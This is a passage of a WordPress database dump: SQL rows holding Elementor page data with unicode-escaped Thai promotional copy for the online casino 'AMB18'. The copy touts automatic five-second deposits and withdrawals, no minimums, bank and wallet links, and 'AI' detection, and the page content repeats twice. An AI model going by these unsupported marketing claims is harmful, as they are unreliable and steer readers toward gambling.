\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 5 \\u0e27\\u0e34\\u0e40\\u0e07\\u0e34\\u0e19\\u0e40\\u0e02\\u0e49\\u0e32\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"0cb3fb0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-pm-slice=\\\"0 0 []\\\">\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19 <b>AMB18\\u00a0<\\/b>\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\\u0e17\\u0e35\\u0e48\\u0e17\\u0e31\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e22 \\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e2a\\u0e1a\\u0e32\\u0e22\\u0e02\\u0e2d\\u0e07\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e33\\u0e07\\u0e32\\u0e19\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e40\\u0e15\\u0e47\\u0e21\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a \\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e17\\u0e33\\u0e23\\u0e32\\u0e22\\u0e01\\u0e32\\u0e23\\u0e40\\u0e2a\\u0e23\\u0e47\\u0e08\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e2b\\u0e32\\u0e23\\u0e07\\u0e1a\\u0e1b\\u0e23\\u0e30\\u0e21\\u0e32\\u0e13\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e22\\u0e37\\u0e14\\u0e2b\\u0e22\\u0e38\\u0e48\\u0e19 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33 \\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35 \\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e41\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e44\\u0e17\\u0e22 \\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e1c\\u0e39\\u0e49\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e04\\u0e27\\u0e32\\u0e21\\u0e44\\u0e27 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e44\\u0e23\\u0e01\\u0e47\\u0e15\\u0e32\\u0e21\\u0e04\\u0e27\\u0e23\\u0e43\\u0e0a\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e35\\u0e2a\\u0e15\\u0e34 \\u0e41\\u0e25\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e2d\\u0e32\\u0e22\\u0e38 18 \\u0e1b\\u0e35\\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e34\\u0e14\\u0e0a\\u0e2d\\u0e1a<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"11898c9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/3icon-AMB18.webp\",\"id\":345,\"size\":\"\",\"alt\":\"\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":70,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1741422\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e17\\u0e33\\u0e44\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c AMB18 \\u0e16\\u0e36\\u0e07\\u0e40\\u0e23\\u0e47\\u0e27\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2d\\u0e37\\u0e48\\u0e19\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d9b3a68\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"2289\\\" data-end=\\\"2531\\\">\\u0e2a\\u0e34\\u0e48\\u0e07\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49 <b>AMB18\\u00a0<\\/b>\\u0e42\\u0e14\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2d\\u0e37\\u0e48\\u0e19 \\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35 <strong data-start=\\\"2353\\\" data-end=\\\"2380\\\">Auto Transaction System<\\/strong> \\u0e17\\u0e35\\u0e48\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07\\u0e01\\u0e31\\u0e1a\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e41\\u0e25\\u0e30\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e27\\u0e2d\\u0e40\\u0e25\\u0e17\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e44\\u0e17\\u0e22 \\u0e0b\\u0e36\\u0e48\\u0e07\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e19\\u0e35\\u0e49\\u0e16\\u0e39\\u0e01\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32\\u0e08\\u0e32\\u0e01 USA \\u0e41\\u0e25\\u0e30\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e23\\u0e31\\u0e1a\\u0e41\\u0e15\\u0e48\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e17\\u0e22\\u0e42\\u0e14\\u0e22\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30<\\/p><p data-start=\\\"2533\\\" data-end=\\\"2575\\\"><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\\u00a0<\\/strong><\\/span><b><u>AMB18<\\/u><\\/b><\\/p><ul><li data-start=\\\"2578\\\" data-end=\\\"2668\\\"><strong data-start=\\\"2578\\\" data-end=\\\"2617\\\">\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07\\u0e01\\u0e31\\u0e1a\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e17\\u0e38\\u0e01\\u0e41\\u0e2b\\u0e48\\u0e07<\\/strong> \\u0e40\\u0e0a\\u0e48\\u0e19 \\u0e01\\u0e2a\\u0e34\\u0e01\\u0e23\\u0e44\\u0e17\\u0e22, \\u0e01\\u0e23\\u0e38\\u0e07\\u0e40\\u0e17\\u0e1e, \\u0e44\\u0e17\\u0e22\\u0e1e\\u0e32\\u0e13\\u0e34\\u0e0a\\u0e22\\u0e4c, \\u0e01\\u0e23\\u0e38\\u0e07\\u0e28\\u0e23\\u0e35\\u0e2f \\u0e2f\\u0e25\\u0e2f<\\/li><li data-start=\\\"2671\\\" data-end=\\\"2753\\\"><strong data-start=\\\"2671\\\" data-end=\\\"2707\\\">\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a TrueMoney Wallet \\u0e40\\u0e15\\u0e47\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a<\\/strong> \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e43\\u0e0a\\u0e49\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23<\\/li><li data-start=\\\"2756\\\" data-end=\\\"2796\\\"><strong data-start=\\\"2756\\\" data-end=\\\"2794\\\">\\u0e15\\u0e23\\u0e27\\u0e08\\u0e08\\u0e31\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e14\\u0e49\\u0e27\\u0e22 AI \\u0e2d\\u0e31\\u0e08\\u0e09\\u0e23\\u0e34\\u0e22\\u0e30<\\/strong><\\/li><li data-start=\\\"2799\\\" data-end=\\\"2866\\\"><strong data-start=\\\"2799\\\" data-end=\\\"2840\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14\\u0e41\\u0e1a\\u0e1a 2 \\u0e0a\\u0e31\\u0e49\\u0e19 (2FA)<\\/strong> \\u0e1b\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e19\\u0e01\\u0e32\\u0e23\\u0e42\\u0e08\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25<\\/li><li data-start=\\\"2869\\\" data-end=\\\"2919\\\"><strong data-start=\\\"2869\\\" data-end=\\\"2903\\\">\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07 5 \\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35\\u0e15\\u0e48\\u0e2d\\u0e23\\u0e32\\u0e22\\u0e01\\u0e32\\u0e23<\\/strong> \\u0e17\\u0e31\\u0e49\\u0e07\\u0e1d\\u0e32\\u0e01\\u0e41\\u0e25\\u0e30\\u0e16\\u0e2d\\u0e19<\\/li><\\/ul><blockquote><p style=\\\"text-align: center;\\\" data-start=\\\"2921\\\" data-end=\\\"3018\\\"><em><span style=\\\"color: #ffcc00;\\\"><b>\\u0e14\\u0e49\\u0e27\\u0e22\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e19\\u0e35\\u0e49 AMB18 \\u0e08\\u0e36\\u0e07\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e17\\u0e35\\u0e48\\u0e17\\u0e31\\u0e49\\u0e07 \\u201c\\u0e40\\u0e23\\u0e47\\u0e27\\u201d \\u0e41\\u0e25\\u0e30 \\u201c\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23\\u201d \\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e44\\u0e17\\u0e22\\u0e43\\u0e19\\u0e02\\u0e13\\u0e30\\u0e19\\u0e35\\u0e49<\\/b><\\/span><\\/em><\\/p><\\/blockquote>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2990,399,'_thumbnail_id','345'),(2996,400,'_elementor_edit_mode','builder'),(2997,400,'_elementor_template_type','wp-page'),(2998,400,'_elementor_version','3.35.5'),(2999,400,'_elementor_pro_version','3.32.3'),(3000,400,'_wp_page_template','default'),(3001,400,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(3002,400,'_elementor_data','[{\"id\":\"3ffd0d3\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"e0d3c94\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"70ef781\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 \\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\\u0e17\\u0e31\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e22 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e23\\u0e47\\u0e27\\u0e2a\\u0e38\\u0e14\\u0e43\\u0e19\\u0e44\\u0e17\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 5 \\u0e27\\u0e34\\u0e40\\u0e07\\u0e34\\u0e19\\u0e40\\u0e02\\u0e49\\u0e32\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"0cb3fb0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-pm-slice=\\\"0 0 []\\\">\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19 <b>AMB18\\u00a0<\\/b>\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\\u0e17\\u0e35\\u0e48\\u0e17\\u0e31\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e22 \\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e2a\\u0e1a\\u0e32\\u0e22\\u0e02\\u0e2d\\u0e07\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e33\\u0e07\\u0e32\\u0e19\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e40\\u0e15\\u0e47\\u0e21\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a \\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e17\\u0e33\\u0e23\\u0e32\\u0e22\\u0e01\\u0e32\\u0e23\\u0e40\\u0e2a\\u0e23\\u0e47\\u0e08\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e2b\\u0e32\\u0e23\\u0e07\\u0e1a\\u0e1b\\u0e23\\u0e30\\u0e21\\u0e32\\u0e13\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e22\\u0e37\\u0e14\\u0e2b\\u0e22\\u0e38\\u0e48\\u0e19 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33 \\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35 \\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e41\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e44\\u0e17\\u0e22 \\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e1c\\u0e39\\u0e49\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e04\\u0e27\\u0e32\\u0e21\\u0e44\\u0e27 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e44\\u0e23\\u0e01\\u0e47\\u0e15\\u0e32\\u0e21\\u0e04\\u0e27\\u0e23\\u0e43\\u0e0a\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e35\\u0e2a\\u0e15\\u0e34 \\u0e41\\u0e25\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e2d\\u0e32\\u0e22\\u0e38 18 \\u0e1b\\u0e35\\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e34\\u0e14\\u0e0a\\u0e2d\\u0e1a<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"11898c9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/3icon-AMB18.webp\",\"id\":345,\"size\":\"\",\"alt\":\"\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":70,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1741422\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e17\\u0e33\\u0e44\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c AMB18 \\u0e16\\u0e36\\u0e07\\u0e40\\u0e23\\u0e47\\u0e27\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2d\\u0e37\\u0e48\\u0e19\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d9b3a68\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"2289\\\" data-end=\\\"2531\\\">\\u0e2a\\u0e34\\u0e48\\u0e07\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49 <b>AMB18\\u00a0<\\/b>\\u0e42\\u0e14\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2d\\u0e37\\u0e48\\u0e19 \\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35 <strong data-start=\\\"2353\\\" data-end=\\\"2380\\\">Auto Transaction System<\\/strong> \\u0e17\\u0e35\\u0e48\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07\\u0e01\\u0e31\\u0e1a\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e41\\u0e25\\u0e30\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e27\\u0e2d\\u0e40\\u0e25\\u0e17\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e44\\u0e17\\u0e22 \\u0e0b\\u0e36\\u0e48\\u0e07\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e19\\u0e35\\u0e49\\u0e16\\u0e39\\u0e01\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32\\u0e08\\u0e32\\u0e01 USA 